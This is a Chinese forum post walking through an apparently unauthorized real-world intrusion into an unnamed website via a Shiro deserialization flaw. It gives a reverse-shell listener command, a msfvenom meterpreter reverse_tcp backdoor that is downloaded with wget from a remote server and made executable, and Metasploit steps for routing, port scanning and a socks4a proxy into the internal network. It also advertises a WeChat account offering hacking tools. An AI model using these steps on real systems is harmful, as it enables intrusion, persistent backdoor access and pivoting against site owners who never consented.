安全矩阵

用户名  找回密码
 立即注册
帖子
查看: 2495|回复: 0

实战|某网站shiro反序列化漏洞的渗透过程

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2022-2-23 10:17:35 | 显示全部楼层 |阅读模式
原文链接:实战|某网站shiro反序列化漏洞的渗透过程

打进内网以后的过程没有继续深入搞,具体原因大家懂的,
前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户,

返回包存在 :Set-Cookie: rememberMe=deleteMe; 参数, 测试一下 shiro漏洞,万一没修复就捡到了,美滋滋
成功打到DNSLOG 返回信息

得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,
vps 开启NC 监听  nc -lvp 777 成功返回

获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成  elf 后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。
把生成好的后门放在远程HTTP服务上面,
在shell里,wget 远程下载

成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root

msf 运行命令  use exploit/multi/handler   获得shell反弹地址
set payload linux/x64/meterpreter/reverse_tcp
地址填写VPS  端口写后门端口就好了,直接run

查看内网路由,添加路由命令

  1. run get_local_subnets //获取路由地址
  2. run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
  3. run autoroute -p //查看添加的路由
  4. run autorouute -d //删除添加的路由
复制代码



内网扫描端口  use auxiliary/scanner/portscan/tcp

利用msf socks4a模块代理
  1. use auxiliary/server/socks4a
  2. set SRVHOST IP
  3. set SRVPORT 端口
复制代码

运行返回信息:
  1. msf5 auxiliary(server/socks4a) > run
  2. [*] Auxiliary module running as background job 0.
  3. [*] Starting the socks4a proxy server
复制代码

本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问某会议系统



回复

举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-5-6 04:35 , Processed in 0.015063 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表